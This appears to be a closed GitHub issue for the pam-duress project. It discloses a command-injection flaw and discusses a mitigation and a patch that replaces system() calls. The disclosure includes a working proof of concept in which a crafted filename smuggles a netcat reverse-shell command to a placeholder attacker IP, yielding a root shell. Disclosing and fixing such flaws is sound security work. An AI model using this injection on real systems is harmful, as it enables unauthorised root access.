Closed nuvious closed 3 years ago
Code injection confirmed:
# On target machine as unprivileged user.
$> touch ~/.duress/'ls;"; nc [IP OF ATTACKING MACHINE] 4242 -c bash; echo "'
$> chmod 500 ~/.duress/'ls;"; nc [IP OF ATTACKING MACHINE] 4242 -c bash; echo "'
$> duress_sign ~/.duress/'ls;"; nc [IP OF ATTACKING MACHINE] 4242 -c bash; echo "'
Password:
Confirm:
# On attacking machine
$> nc -nlvp 4242 # Then log in on target machine via terminal, ssh, etc
whoami
root
Mitigation for anyone using this for now is to touch /home/USER/.duress
and make it owned by root to prevent users from creating duress scripts. Other issues/feature requests will make running ~/.duress directories togglable via config and this issue will be resolved when setuid/setguid/setenv are implemented instead of system().
Below is the full text of the email sent with the patch. Part of the implementation is already in the PR #12. Remainder of the fix is to use setuid/setgid/setenv as apposed to using system() which potentially provides a code-injection avenue.
(Untested) attempt to fix patch https://github.com/nuvious/pam-duress/pull/2 and remove avenues for improper shell quoting and unexpected code injection.
Implement our own analogue to system() which sets environ for PAMUSER and drops privs without parsing any of the user-modifiable values, guarding against unsafe input. As a side effect, this provides granular error handling for failed setenv, setuid, or setgid as opposed to overloading one system() call for it.